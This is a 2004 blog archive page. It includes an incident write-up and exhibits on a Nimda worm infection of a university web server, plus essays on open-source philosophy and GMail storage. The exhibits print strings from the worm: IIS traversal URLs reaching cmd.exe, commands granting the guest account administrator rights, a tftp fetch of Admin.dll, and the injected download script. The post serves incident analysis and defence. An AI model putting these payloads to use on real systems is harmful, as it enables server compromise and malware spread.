Showing posts with label article. Show all posts
Showing posts with label article. Show all posts

December 22, 2004

When Things suddenly went wrong: w32.nimda.a@mm - Exhibits

Exhibits related to the Nimda attack at www.iimcal.ac.in


Exhibit A - CleanScript.pl (The script to clean the script in the infected file heirarchy.)


#!/usr/bin/perl

#Change this with the starting point of your
# directory dump
$dir = "/home/n_ravikiran/Website";

&listdirectory($dir);

sub listdirectory
{
local($dir);
local(@lines);
local($subdir);
local($lvl_counter);
local($list_length);

$dir = $_[0];
if(opendir (DIR, $dir))
{
@lines = readdir (DIR);
closedir (DIR);
$lvl_counter = 2;
$list_length = ( scalar @lines );
while ($lvl_counter < $list_length)
{
$subdir = $dir."/".$lines[$lvl_counter];
if(opendir (SUBDIR, $subdir))
{
closedir (SUBDIR);
&listdirectory($subdir);
}
else
{
&processnames($subdir);
}
$lvl_counter++;
}
}
}

sub processnames {
$filecount++;
open(FP,$_[0]);
@totalFile = <FP>;
close(FP);
open(FP,">$_[0]");
foreach $line (@totalFile)
{
if( $line =~ /readme.eml/)
{
print ($line);
}
else
{
print FP $line;
}
}

close(FP);

print ("$filecount $_[0]\n");
}


Exhibit B - Interesting Strings


a) Some Registry Entries.


System\CurrentControlSet\Services\VxD\MSTCP
NameServer
SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\
SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces
Concept Virus(CV) V.5, Copyright(C)2001 R.P.China


b) The header of the mail file. Note the content type
is called wave ;) the neat trick used to deliver an executable
file. The file however is called readme.exe


MIME-Version: 1.0
Content-Type: multipart/related;
type="multipart/alternative";
boundary="====_ABC1234567890DEF_===="
X-Priority: 3
X-MSMail-Priority: Normal
X-Unsent: 1
--====_ABC1234567890DEF_====
Content-Type: multipart/alternative;
boundary="====_ABC0987654321DEF_===="
--====_ABC0987654321DEF_====
Content-Type: text/html;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
<HTML><HEAD></HEAD><BODY bgColor=3D#ffffff>
<iframe src=3Dcid:EA4DMGBP9p height=3D0 width=3D0>
</iframe></BODY></HTML>
--====_ABC0987654321DEF_====--
--====_ABC1234567890DEF_====
Content-Type: audio/x-wav;
name="readme.exe"
Content-Transfer-Encoding: base64
Content-ID: <EA4DMGBP9p>
--====_ABC1234567890DEF_====

c) Some more beautiful ideas. The hiding mechanism of
the virus in case cleaning is done from the dos prompt or
otherwise. Causing the setup to 'update' the machine with
the virus at boot time.

NUL=
[rename]
\wininit.ini

d) Payload attack method. Notice the enabling of the sharing.
Then the Administrator access to guests. The hiding of the
file extensions. (The reason for this is wonderful. readme.
exe comes with an icon that looks like that of HTML files
of IE, with the symbol 'e'. If extensions are displayed this
method of inducing users to execute the file would fail)

Personal
Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
\*.*
EXPLORER
fsdhqherwqi2001
SYSTEM\CurrentControlSet\Services\lanmanserver\Shares\Security
share c$=c:\
user guest ""
localgroup Administrators guest /add
localgroup Guests guest /add
user guest /active
open
user guest /add
HideFileExt
ShowSuperHidden
Hidden
Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
\\%s
%ld %ld %ld
%ld %ld

e) On NT, hiding and maybe a timebomb? Note the counter...

ID Process
Elapsed Time
Priority Base
Working Set Peak
Working Set
% User Time
% Privileged Time
% Processor Time
Process
Counter 009
software\microsoft\windows nt\currentversion\perflib\009
Counters
Version
Last Counter
software\microsoft\windows nt\currentversion\perflib

f) NT again. Attack on IIS this way.

/scripts
/MSADC
/scripts/..%255c..
/_vti_bin/..%255c../..%255c../..%255c..
/_mem_bin/..%255c../..%255c../..%255c..
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c..
/scripts/..%c1%1c..
/scripts/..%c0%2f..
/scripts/..%c0%af..
/scripts/..%c1%9c..
/scripts/..%%35%63..
/scripts/..%%35c..
/scripts/..%25%35%63..
/scripts/..%252f..
/root.exe?/c+
/winnt/system32/cmd.exe?/c+
net%%20use%%20\\%s\ipc$%%20""%%20/user:"guest"
tftp%%20-i%%20%s%%20GET%%20Admin.dll%%20
Admin.dll
c:\Admin.dll
d:\Admin.dll
e:\Admin.dll

g) The added string for delivery of payload. This started it all.

<html><script language="JavaScript">window.open("readme.eml",null, "resizable=no,top=6000,left=6000")</script></html>
/Admin.dll
GET %s HTTP/1.0
Host: www
Connnection: close

h) Unknown agenda of the payload. Winzip is not infected,
says symantec. The dll that is infected and that prevents
Word from working properly (or any editor that uses it). The
string that goes into the system.ini file.

readme
main
index
default
html
.asp
.htm
\readme.eml
.exe
winzip32.exe
riched20.dll
.nws
.eml
.doc
.exe
dontrunold

i) Some references that show the work that the payload does on the user side.

gethostbyname
gethostname
sendto
send
recvfrom
recv

MAPILogoff
MAPISendMail
MAPIFreeBuffer
MAPIReadMail
MAPIFindNext
MAPIResolveName
MAPILogon
MAPI32.DLL

Subject:
From: <
DATA
RCPT TO: <
MAIL FROM: <
HELO
aabbcc
-dontrunold
NULL
\readme*.exe
admin.dll
qusery9bnow
-qusery9bnow
\mmc.exe
\riched20.dll
boot
Shell
explorer.exe load.exe -dontrunold
\system.ini
\load.exe
octet

j) Some more Registry Entries

SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths
Type
Remark
SOFTWARE\Microsoft\Windows\CurrentVersion\Network\LanMan\X$
Parm2enc
Parm1enc
Flags
Path
SOFTWARE\Microsoft\Windows\CurrentVersion\Network\LanMan\
SOFTWARE\Microsoft\Windows\CurrentVersion\Network\LanMan
SYSTEM\CurrentControlSet\Services\lanmanserver\Shares
Cache
Software\Microsoft\Windows\CurrentVersion\Explorer\MapMail
QUIT


Exhibit C - Nimda Attack Sequence

The following lines were the logs of the attack on the Linux machine by a particular IIS server. Although our IIS server fell to the first of these attacks, the Linux server has been braving the blizzard all along. Okay the worm cannot hit it, yet the feeling of safety is great. Initially this was restricted to 203. addresses, but now we are having attacks from all sorts of ip ranges. Also another thing to note is that the attacks have become particularly nasty on this machine, while the patched IIS server was subsequently left alone. Seems as if the choosen one for attack is not entirely random.

203.197.64.3 - - [21/Sep/2001:16:38:29 +0530] "GET /scripts/root.exe?/c+dir
HTTP/1.0" 404 292 "-" "-"
203.197.64.3 - - [21/Sep/2001:16:38:29 +0530] "GET /MSADC/root.exe?/c+dir
HTTP/1.0" 404 290 "-" "-"
203.197.64.3 - - [21/Sep/2001:16:38:29 +0530] "GET /c/winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 300 "-" "-"
203.197.64.3 - - [21/Sep/2001:16:38:29 +0530] "GET /d/winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 300 "-" "-"
203.197.64.3 - - [21/Sep/2001:16:38:29 +0530] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 314 "-" "-"
203.197.64.3 - - [21/Sep/2001:16:38:29 +0530] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 331 "-" "-"
203.197.64.3 - - [21/Sep/2001:16:38:29 +0530] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 331 "-" "-"
203.197.64.3 - - [21/Sep/2001:16:38:29 +0530] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 347 "-" "-"
203.197.64.3 - - [21/Sep/2001:16:38:29 +0530] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 313 "-" "-"
203.197.64.3 - - [21/Sep/2001:16:38:29 +0530] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 313 "-" "-"
203.197.64.3 - - [21/Sep/2001:16:38:30 +0530] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 313 "-" "-"
203.197.64.3 - - [21/Sep/2001:16:38:30 +0530] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 313 "-" "-"
203.197.64.3 - - [21/Sep/2001:16:38:30 +0530] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 400 297 "-" "-"
203.197.64.3 - - [21/Sep/2001:16:38:30 +0530] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 400 297 "-" "-"
203.197.64.3 - - [21/Sep/2001:16:38:30 +0530] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 314 "-" "-"
203.197.64.3 - - [21/Sep/2001:16:38:30 +0530] "GET /scripts/..%252

November 22, 2004

The Philosophy of the Free & Open

And how it impacts us.

Open Source, is not about Linux. It is not about Apache [1], mySQL [2] or GNOME [3]. In fact, it is not about software at all. Rather it is a philosophy and a belief. A belief that is not only old, but is rather clichéd and goes – “The pen is mightier than the sword”.

The Internet has breathed a new life into this saying, granting it an awesome power. Power enough, that a few individuals, scattered across vast distances, armed with nothing but knowledge, are now planning world-domination.

This article is an idle walk down the annals of history and the corridors of philosophy [4], to play with the questions “who” and “why”. Who are these people, and why-o-why are they doing what they are doing.

Free as in Freedom

The words “free software” or “open source” typically evoke responses saying, “It is available without charge”. While true, it is a quirk with the English language [5] that prevents us from seeing the other, truer meaning. English uses the same word “free” to denote both “without a price to pay” and “freedom to do what you wish to do”. It is the second meaning that truly symbolizes all that this movement stands for. The interpretation of this freedom makes one appreciate that this philosophy is not restricted to software at all. It in fact extends a lot wider.

Imagine a bunch of kids given a huge white canvas, spotlessly clean, and spray cans of red paint. More often than not, the kids will spray away, randomly on the canvas. What if, instead, the kids sat down and started to painstakingly detail the verses of the Iliad or the Ramayana. This is seemingly inconceivable, because of the apparent human nature of preferring the playful to the ordered, which is amplified to an extreme in a group. Directing a random group without either a stick or a carrot seems impossible.

However this impossibility is precisely what is manifesting over at Wikipedia [6]. Wikipedia is an “Open Encyclopedia” where anyone can contribute to any article, without even being logged in. Furthermore, any change perpetrated is visible instantly on the web, without being checked, corrected or in any other fashion moderated by anyone. Given this absolute freedom you would assume chaos – errors in content, clumsiness, information biases, ineptitude or plain vanilla vandalism. However the Wikipedia is one of the web’s most searched encyclopedias, channeling the expertise of thousands to millions more.

Slashdot [7] is another example of this channeled freedom. Despite its obvious biases and pedigree, it remains by far the best example of a publicly moderated discussion board.

The philosophy that drives a hacker of Linux is the same that drives a contributor in Wikipedia. Freedom is not always a bad thing. It does not always result in chaos but begets responsibility and motivates productivity. This freedom is a core tenet of the philosophy of the Open Source movement. I could go on with other examples of the newsgroups [8] or the open courseware [9], but that would be unnecessary. Instead lets spend time tracing the roots of the free and open source philosophy.

In the beginning was the command line

With apologies to Neil Stephenson [10], we are talking about a time that was not too long ago. About three decades ago, the computer meant the PDP-10 [11] or a teletype-fed mainframe. Programming was about thinking in bits and bytes, while programs were meant to be shared, understood, debated upon and improved. Out of thin air and using 0s and 1s, a new science was being invented. C and C++ [12] were being developed, Unix was being coded [13] and software and hardware standards were being set.

The times were reminiscent of the Wild West; with its own tight knit groups, raw excitement and brave gun-wielding heroes. The difference was that the program now replaced the gun and the mainframe was the battlefield. It was this arena that the corporation was presently entering. With a promise to take computing to the masses companies were doing something that was unacceptable to the pioneers – “selling” software.

Richard Stallman [14] was an early pioneer. He believed that software was a universal tool and the source was its soul. Closing source or selling software was something that was utterly unacceptable to him. And he was prepared to do something about it. In 1984, the same year Apple Computer released the Macintosh, Stallman set up the GNU foundation [15].

GNU stands for GNU’s Not Unix, whose vision, satirically, was to provide a full, free version of UNIX. In 1984, UNIX was the predominant OS and was available in a mind-boggling variety of commercial flavors each fragmented from and incompatible with another. The Personal Computer as a product was almost non-existent then and as a concept was still a joke. GNU therefore sought to “liberate” the entire computing world by providing the fundamental tool – the Unix OS – for free.

UNIX-like operating systems are built of two basic parts – the kernel and the utilities. The kernel is the core, which handles the very low level interactions with the hardware, memory and the processor. It only provides a very basic functionality that is converted into something useful by the utilities. UNIX, by its rich heritage has a multitude of tools for every activity from network management to text processing.

While some members of the GNU started recreating the rich toolset, others started work on the kernel, called the HURD [16]. In time the tools started rolling out, each free, available with the source, providing functionality similar to or better than those provided by the various commercial Unices. The development of the kernel was however heading nowhere. The late 1980’s saw the advent [17] of the true Personal Computer – cheap Intel hardware running DOS or the early Windows.

Without the kernel, and a rapidly dying breed of mainframes unable to survive the onslaught of the PC, the GNU movement suddenly faced irrelevance.

In 1991, Linus Torvalds, a 21-year-old computer science student at the University of Helsinki, decided that his personal operating system, Minix, a Unix-look-alike was not good enough. He was pretty sure he could write something better and attempted to code his own. But in doing this he turned to the Internet for help and guidance [18]. He also put the source code of his attempts back on the net for comments and correction. And from this sprang the kernel, which we now know as Linux. Linux as a kernel could run on the same contemporary hardware used by DOS and Windows. Further, being based on the same standard as that of the older UNIX, Linux could run programs written for the older UNIX kernels.

For GNU, this meant that their long wait for a free kernel was finally over. For Linux this meant that it finally had programs that could actually utilize the kernel that was being built. GNU/Linux became the complete ‘free’ operating system that Richard Stallman and a number of others had been dreaming of.

On the shoulders of Giants

It is people who ultimately define the success of any idea. So it is with the idea of the “open”. Among the multitude of programmers, users, fans and followers of the free and open source movements, there are some who have helped define the soul of the FOSS movement. There are some like Richard Stallman, who are fanatically devoted to the idea of free software, while others like Linus Torvalds, have been the silent, media-shy icons of the movement. There however are others who have helped give a more balanced view of the philosophy of FOSS.

Eric S. Raymond is a Linux evangelist and the author of three extremely powerful essays [19] on the philosophy of Free and Open Source. Called “The Cathedral and the Bazaar”, “Homesteading the Noosphere” and “The Magic Cauldron”, these essays present a very logical account of the FOSS philosophy. These essays discuss the social, economic and personal drives, reasons and justifications for the success of the open approach. Bruce Perens is another Linux advocate whose article “The Open Source Definition” [20] is a fundamental account of the principle of the FOSS camp. These essays explore the novel effect of having a loosely bound; part time volunteers drive projects of unimaginable magnitude and give it all away for free.

One notable side effect of the having such a diverse and widespread fan base is that villains are instantly vilified and secrets don’t remain secret for long. Take the example of the famous “Halloween Documents” [21].

Microsoft, during Halloween 1998, commissioned an internal strategy memorandum on its responses to the Linux/Open Source Phenomenon. Unfortunately, it leaked, and within days was all over the Internet being taken apart by numerous FOSS advocates. Microsoft was always acknowledged to be the directly affected party because of the FOSS, but it was till then more of a cold war. The Halloween documents changed all that. Open Source advocates openly condemned Microsoft. Microsoft slowly started realizing that FOSS was rapidly changing from being a fringe movement to something that directly threatened it. It responded by sowing, what is now known as, FUD (Fear, Uncertainty and Doubt) in the minds of its customers. For the first time Microsoft directly acknowledged [22] that Linux had the capacity to unseat it, and started attacking the fundamental value propositions [23] of Linux and the FOSS.

It is also about this time that the mainstream press started increasing its coverage of the FOSS. The coverage was initially about Linux, the free replacement of Unix. Then it was about the sustainability of the Open Source as a Business model. And lately it is about David Vs Goliath – FOSS Vs Microsoft.

The press is an expression of popular opinion. Complementally the press forms popular opinion. And the popular opinion, therefore, weighs heavily on portraying FOSS as the David in the David Vs Goliath story.

This is where we come in

As long as we restrict our view of the FOSS movement to the software it generates, this popular opinion would seem perfectly reasonable. However if we realize that the philosophy of FOSS extends beyond the mere products of the FOSS movement, we begin to realize the nature of our relationship with it. Without too great a risk of generalization, the true nature of the spirit and philosophy of the FOSS is nothing short of the Internet itself.

The philosophy if FOSS is about freedom, freedom defined as “libre” – lack of constraints. It is a spirit of sharing and collaboration. It is a spirit that places quality above other considerations. It is a spirits that drives and is driven by a free flow of ideas. It is a philosophy that considers information supreme.

Every time we search the Internet for tips we are appealing to the philosophy of Open Source. Every code snippet, article, comparative analysis, forum on the Internet is driven by this philosophy. Every self-taught computer user is a product of the philosophy of the Open Source.

To consider this movement and the change it entails as anything less than mammoth would be childish. It involves a fundamental shift in our perception of the business of Information Technology itself. However, the change is upon us. It is now up to us to either respond proactively or to passively let events take the lead in changing us.

References

[1] http://www.apache.org/
[2] http://www.mysql.com/
[3] http://www.gnome.org/
[4] http://www.gnu.org/philosophy/philosophy.html
[5] http://www.gnu.org/philosophy/categories.html#FreeSoftware
[6] http://www.wikipedia.org/
[7] http://slashdot.org/
[8] http://groups.google.com/
[9] http://ocw.mit.edu/index.html
[10] http://www.cryptonomicon.com/beginning.html
[11] http://en.wikipedia.org/wiki/PDP-10
[12] http://www.research.att.com/~bs/C++.html
[13] http://www.bell-labs.com/history/unix/
[14] http://www.stallman.org/
[15] http://www.gnu.org/
[16] http://www.gnu.org/software/hurd/hurd.html
[17] http://www.geocities.com/n_ravikiran/write008.htm
[18] http://www.geocities.com/n_ravikiran/write003a.htm
[19] http://www.catb.org/~esr/writings/cathedral-bazaar/
[20] http://perens.com/Articles/OSD.html
[21] http://www.opensource.org/halloween/
[22] http://news.com.com/2100-1001_3-253320.html
[23] http://www.microsoft.com/mscorp/facts/default.asp

Document Changes
November, 22, 2004: First published version.

The gig for the Gigabyte

And how GMail might become just another free email provider

GMail, seems to have opened the floodgates for email storage. And while it is still in its beta stage, quite a few other free email providers are threatening to take away the crucial popular advantage that GMail seems to offer.

We will look at the issue in two sections - first we will try to understand the big ado about the 1 GB email service. Then we will look at how this affects GMail.

The Gigabyte fallacy

Ever since GMail came with the email for life offer, everyone seems to be falling head over heels in telling everyone that 1 GB of email space is good, and in other words that we all need 1 GB of email storage. Though 1 GB is good, it is like the offer at your favourite restaurant - "Eat all that you can and pay your usual". The problem with such an offer is this - you just cannot eat any more just because it is available.

Email users are typically of three types - the desktop user, the home user and the kiosk user. These are non standard terms, more of relevance to this article.

The desktop user is a user who does not use the webmail. He has a desktop email client and users a service provider to connect to. We assume that this user is one of the heaviest users of email.

The home user connects to the Internet using a personal/dedicated machine and has an alternative disk storage without having the Internet connectivity enabled. This user uses webmail and typically is a lighter user than the desktop user.

The kiosk user is user who uses a public machine and a public connection. Such a user does not own any disk space and cannot access any data without having a live Internet connectivity.

Lets look at how long it takes each of these users to rake up 1000 MB or 1 GB on their email accounts. We assume that a desktop user typically adds 1 GB every year to the size of his inbox. Taking into account that the usage might not be dedicated and to err on the conservative side, this is about 400 kb every hour. We assume that a home user is half as active in using email and a kiosk is one-fourth as active. This means that a home user takes 4.5 years to rake up a GB while a kiosk user takes 16 years to make 1 GB.

Profile
Usage Factor
Hours / week
MB / Week
Weeks to 1 G
Years
Desktop user 1 45 18 55.5 1
Home user 0.5 21 4.2 238 4.6
Kiosk user 0.25 12 1.2 833 16

Assuming a 1:3 split between the Home user and the Kiosk user, we have, on an average 13.2 years for users to hit their 1 GB mark. A lot of things can happen during this time. More importantly this means that the webmail provider only has to increase his inbox size only up to 75 MB per subscriber and need not gear up to 1000 MB anytime in the near future.

In short this means that the Gigabyte is not as huge as it is made out to be. The actual usage of it might be a lot lesser than even these numbers suggest. There is hence little that is actually different in the Gigabyte rush.

However the only thing that will severely affect these numbers is the usage patterns. Unless GMail becomes the next biggest file sharing network things might change. Again, as long as the bottleneck is the network and not storage, things might not change all that much.

Document Changes
November, 22, 2004: First published version.

When Things suddenly went wrong: w32.nimda.a@mm

The attack of the worm and the response.

This is a description of the Nimda virus attack on the official web site of Indian Institute of Management, Calcutta, on 18th September, 2001 and the subsequent response by the student system administrator team.

I was in my room, preparing for a course submission two days away, when the first alarm trickled down to me. I was struggling with a VB project, with Megadeth having sole control of my ear drums, when my neighbor Vipul, interrupted me. He was pretty incomprehensible at first, but slowly it dawned on me that I was supposed to log onto the institute web site.

As soon as I logged onto the site I knew something was wrong. We had left it safe and sound, not more than two hours ago. But now as soon as the page came up, a second window popped up and requested the download of a "readme.eml" file. I knew that eml files were used to save emails by Outlook and Outlook Express. I hoped against hope, that the eml file had something to do with my open Outlook, but very soon I was disabused.

I opened a second page on the web site, which also resulted in the pop up and download of the same "readme.eml" file. Twice was definitely no coincidence. Fighting that sinking feeling, my hope B was that the site may have been hacked or was under attack. I had to look for something, either confirming or denying this hypothesis. And the only clue I had was the eml file. Using Outlook to figure out the contents of the file showed me that there was indeed an executable file "readme.exe" as a attachment within the eml file.

The existence of the attachment caused a variety of alarms bells to go off in unison. Firstly it definitely looked like a virus, and secondly it was propagating from the web site and not via email. That morning, I had read in the morning about another variant of the 'code red' virus that was reportedly ready to start damage. Fearing the worst, my next steps were clear - I had to be at the server room physically and not in my room trying to do anything remotely. I called Vipul to join me and hurried to the main server room.

Why I was spared

Thinking back, it was pretty reckless of me to try to get to the details of the eml file in my room. But I eventually escaped infection - by nothing more than pure luck. A few days ago, my computer had been unceremoniously powered off a number of times by the Electricity corporation of West Bengal forcing me to reinstall Windows. As a result of this I ended up downgrading my Internet Explorer from the newer 5.5 version to the default 5 version that came bundled with Win98. As we will see later, the reinstall was a blessing in disguise. If this had not been the case, I would have been cleaning my own machine and saving my VB projects, instead of being free to work on just the main server.

The Server room

I was greeted at the server room by an extremely sluggish main server. This was a Compaq Proliant ML 350 running Windows NT 4. It took more than two minutes just to get to the logon screen. And all the while I could clearly see the hard drive thrashing. I was sorely tempted to switch off the machine and get it offline so that I could safely start it back up to see what damage had been done. But knowing nothing more about what was happening or the cause, I was reluctant to take any drastic measures. I continued to try to get the machine back in control.

By the time I finally got to the Shell, there was no one there. Explorer was dying intermittently and Dr.Watson (the crash recovery program on NT) was spawning all over the place. Then I found the one tool that differentiated the NT line from Windows 9x - the Task manager. Quickly I brought it up and killed off the erring Explorer and all the goody Dr.Watsons. Switching to the process list I saw dozens of processes running called - 'net'. As far as I knew, none was how many I should have seen. Meanwhile, there was no let up for the hard disk and the machine was barely responsive. In the next few minutes I slaughtered as many of the unnecessary processes as I could lay my mouse on and when I found the machine a tad quicker, sent it for a shutdown. Amidst screaming new processes the server went down.

Once I had the server down, there was a sense of peace. At least no further damage could be done. But God only knew what damage had already been done. At this point, I was still trying to convince myself that the whole thing was a hack of some kind, given the many 'net' processes and my ignorance. Yanking off the cable connecting the server I started it back in VGA mode, which was not even a safe mode, but hopefully would allow me to poke around. Dear old Explorer and Dr.Watson were up to the same antics as before. I killed each in turn and finally managed a stable Explorer as long as no one was double clicking programs.

When I finally got to the root directory and opened the default.asp file I saw that very wonderful line I would see over and over again over the next few days.

<html><script language="JavaScript">window.open("readme.eml",null, "resizable=no, top=6000, left=6000")</script></html>

What it did was what we had seen accessing the site - it downloaded the file "readme.eml" into the computers of anyone who happened to load the page. The file "readme.eml" were of course present in the directory. A quick check showed that all the default pages each of the subdirectories were similarly changed and the "readme.eml" file was present in all of them too.

If there was a need for confirmation, this was it. It seemed less and less like a hacker and more and more like a script from a virus or a worm. And I realized that I needed to talk to someone with ideas. We were already trawling the anti-virus sites, trying to see if they had any news. Meanwhile, I went looking for help.

Trying to find help in the campus, my worst fears came true. Across the campus, computers were behaving strangely, MS Word was not saving, and some machines wouldn't even boot. The story was remarkably same everywhere.

"Oh yeah, I did double click on that readme letter, and now it keeps popping up a warning message with 'OK' 'Details>>' buttons."

"I ran a live update yesterday and Norton at the moment does not detect any viruses."

"Every time I reboot things are becoming more and more difficult.".

I main server was down, and I had no luck in finding anyone who had more experience with the server. Sometime around this time, handwritten notices were put up across the campus urging students not to click on any files that said readme or looked like a letter.

What the hell is it?

Back alone in the server room I restarted the server and this time it was tougher controlling Explorer and its buddy Dr.Watson. Finally I killed both of them and started browsing using the command shell. Then I spent time figuring out where the actual executables of the various programs in the Start menu were and started all the monitors and the mmc console that I needed. Then another crack down on the various processes that I felt were unnecessary and including the HTTP and FTP servers. Now I needed more information.

Before we continue, a quick look at the setup we have in IIM Calcutta. We have an intranet of about 400 student machines and more including those of the professors. All are connected to the Internet through two proxies - one Novell and one Linux. The (affected) Web Server is not connected to the internal network directly. Apart from the two proxies there was a third machine running Linux (Red Hat 7.1) that also had two network cards, connected both to the intranet and the Internet. This was a temporary pilot server located next to the main Web Server, and formed the hub of repair activities over the next 35 hours. Presently the machine was being used to poll the web sites of Norton and Mcafee with little information. Further searching by Vipul too yielded the same result - nothing on this, yet.

In time we assembled a team that would be responsible for the task of not only getting the main Server up but also getting the entire extranet rid of the virus. With the team came experience and more ideas. Back on the main Server, the first readme.eml was created at 6:55 p.m. This was the time when the first of the default.asp files were last modified. Vipul's call to me was about an hour later. So the web server was online for a whole hour with the virus doing whatever it was supposed to do. We also discovered that all files that were named default or index had been modified over a period of 6-7 minutes starting 6:55 p.m., pointing to the involvement of a remote script. No script run in the same machine would have taken so long. Also files not linked to from the main web site, (like indexold.asp) were also affected. All fingers now pointed to an external infection through the IIS web server similar to Code Red.

With no further word from the anti-virus sites (so we thought) and a pathetically crippled system, most of us realized that this was not going to be a quick delete, change password recovery. Also reports were trickling in that the virus was rampant across the extranet. All drives were being put on active share and machines on the network with any sort of write permissions were being promptly written into. Looking at the way the payload was working, machines needed to be isolated. Taking a quick decision all the routers in the student section were manually switched off and the student section summarily went offline.

It was already late in the night and there was still no word from the anti-virus sites. Just to be sure we got a copy of the readme.eml file and ran checks on it with all the latest anti-virus packages available. None saw anything wrong with the file, not exactly in-line with what the rest of the student machines were seeing. Then I got probably the last brain wave before my brain shut down for the period - Slashdot. And sure enough it was the third article posted a while back, with links. Now we had a name, nay two, Nimda and Minda. And things were checking out and the worst fears were out in black and white. Even though it was quite late in the night, around 2:00 a.m. and there was one update posted by McAfee and none by Symantec. Our extranet ran on Norton and so things did not look any better. We decided to keep the routers down and the site offline till further notice. Now began the damage control exercises.

Damage Control

As is the case with any other network, the first need was to assure the populace that the steps taken were not to deprive them of the network usage but to protect them. Official notices went out that detailed what had happened and what needed to be done. Also a temporary deadline of 10 a.m. was communicated before we would consider getting the network back online. There was additional control to be done. With any campus as dependant as ours on the network, communication suddenly ground to a halt. The summer placement process came to a halt. Rumors were rampant with many quotes attributed to the team handling the crisis. Most had to countered and the account put straight. Then of course we had to assure all those who were infected that things would be fine and tomorrow would be a better day.

'Tomorrow', just a few hours later, was not a better day. The Mcafee update proved to be useless. That after uninstalling Norton from a number of affected machines, installing Mcafee, updating it and running system wide scans and deleting many of the affected files.

Almost 14 hours into the attack and we hadn't made much progress. The deadline for keeping the routers down was extended to 6:00 p.m. that evening and more notices were printed. Norton was quiet and we had to wait. But in the mean time things did get better, as more and more information was available and we also got some cleaning underway. The main advantage we had was the Linux machine on the network. We could get some parts of the plan in action.

The last backups we had of the entire web site were hopelessly out of date. So we got the infected site zipped up and ftp'ed over into the Linux machine. Ditto the database. Along went copies of the readme.eml file and the readme.exe file.

Information and Modus operandi

Running strings on the executable file was very informative. the strings program basically looks through the entire file and prints out the ASCII strings embedded in it. For example if you write a program that prints "Hello World" and made it into an executable, then strings on the executable would print this string out amongst others. Some excerpts of what we found are given here. Don't worry about understanding all of it, we did not either. But this definitely gave us some clues about the way this virus worked. Most of what we found was further validated by the others in the security business. You can check the other sources out by browsing through the links below.

A quick rundown on how the virus spreads. And since no one really knew what it 'does', apart from spreading that is, we will focus this discussion on how it spreads. Most of this information was culled from the various sources available at that time and from the experience in the campus. Most of the links on this page have more information, but that does not take away from that fact that this information was crucial to us at that time.

Nimda has three methods of propagation, all of which were visible in our setup. The first is the IIS vulnerability. This is the method that was used by the Code Red too. Infected servers randomly search for other servers running IIS and they are attacked. Some attack sequences that took place in vain on our Linux server are here. After the attack the host is forced to run scripts that updates the index*.* and default*.* files on their servers with the javascript string and also copies the readme.eml into the various sub directories. With this the infection of the host is complete. Of course the worm also takes protection against detection and removal in the host machine. Once infected the IIS servers are primarily involved in infecting other servers. Our web server first attacked the Linux server at 7:56 p.m. after being infected itself at 6:55 p.m. Since neither knew about the other, and assuming the initial choice is done randomly, this is the average time for the infected server to find another one in the same IP range.

The second and third modes of transmission occur on the Client machines, after they are infected. Client machines are infected when they visit any site that has been visited by Nimda. A new popup javascript window opens that downloads and opens directly without user intervention, the readme.eml file. This auto execute feature is a security bug in IE5.5 which was what was missing in my copy of IE5 and consequently saved my machine. Once the readme.exe is executed, which may not need you to double click on it, the wily program is inside and it does take a long time to clear out. More information is available on what it does all over the Web. Click on the several links that are at the end of the page.

The second mode is mass mailing. The worm comes with its own mailing engine. It uses MAPI to find addresses and mail itself to all your contacts. The the cycle repeats itself as soon as the target machines are compromised.

The third method is infection across the local network through Microsoft file sharing. It searches for writable shared folders and dumps copies of itself into them. While this does not automatically infect the machine, curiosity to see what the file contains ends up in the machine being compromised.

The long trudge back to normalcy

Back to the story. It was after noon and there were no cleaning tools available. We had volunteers hitting the F5 refresh button every few minutes on all the major anti-virus sites. At the same time we started looking at other methods of cleaning. Earlier we had taken a zip of the entire site and moved it into the Linux machine. Now we unzipped the whole site and started seeing what needed to be done if we were to have a clean version of the site ready for install. We put together a quick script that cleaned all the download lines in the affected asp and html files. You can see the script here. Then a single statement with find, deleted all the eml files from the entire site. Followed that up with a tar -cvzf and viola we had a clean version of the site to deploy - only no web server.

Our prayers were soon to be answered. Symantec did come out with the update, and we were back in action, on the main server. Hours of downloads and reinstallation of Norton anti-virus revealed that most of the new-found enthusiasm was in error. The patches for Code Red were not properly installed and there were other updates to be done before the cleaning was to succeed. The next few hours was spent in cycles of search/locate/download-into-linux-server/ftp-to-main-server/patch-and-update.

In the mean time we used the machine which had a controlled copy of the worm to cause infection and then clean with the anti-virus. This confirmed that the update might indeed work on workstations, though at that time it was highly ineffective on servers. Also our 6:00 p.m. deadline was upon us and we had to stretch it over to 10:00 p.m. that night. But now we had the anti-virus and also information on the propagation of the virus. Notices went out on the need to disable all file sharing from students' computers, infected or otherwise. Also a step-by-step drill was developed to be followed by all users at 10:00 p.m., when the network came back online. Notices went up and leaflets were distributed. Volunteers went out armed with three diskettes containing the updates, to all the critical computer installations in the campus to clean and secure them before the 10:00 p.m. deadline.

